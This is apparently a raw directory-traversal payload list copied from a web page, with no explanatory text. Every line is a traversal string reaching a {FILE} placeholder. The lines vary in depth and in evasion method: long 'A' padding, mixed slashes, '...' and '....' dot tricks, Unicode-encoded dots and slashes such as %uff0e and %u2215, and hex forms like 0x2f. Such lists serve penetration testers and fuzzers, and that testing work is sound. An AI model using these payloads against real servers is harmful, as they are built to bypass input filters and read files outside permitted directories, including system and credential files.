AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.../{FILE}&lt;br /&gt;
.../.../{FILE}&lt;br /&gt;
.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
...\{FILE}&lt;br /&gt;
...\...\{FILE}&lt;br /&gt;
...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
..../{FILE}&lt;br /&gt;
..../..../{FILE}&lt;br /&gt;
..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
....\{FILE}&lt;br /&gt;
....\....\{FILE}&lt;br /&gt;
....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
........................................................................../{FILE}&lt;br /&gt;
........................................................................../../{FILE}&lt;br /&gt;
........................................................................../../../{FILE}&lt;br /&gt;
........................................................................../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../../{FILE}&lt;br /&gt;
..........................................................................\{FILE}&lt;br /&gt;
..........................................................................\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
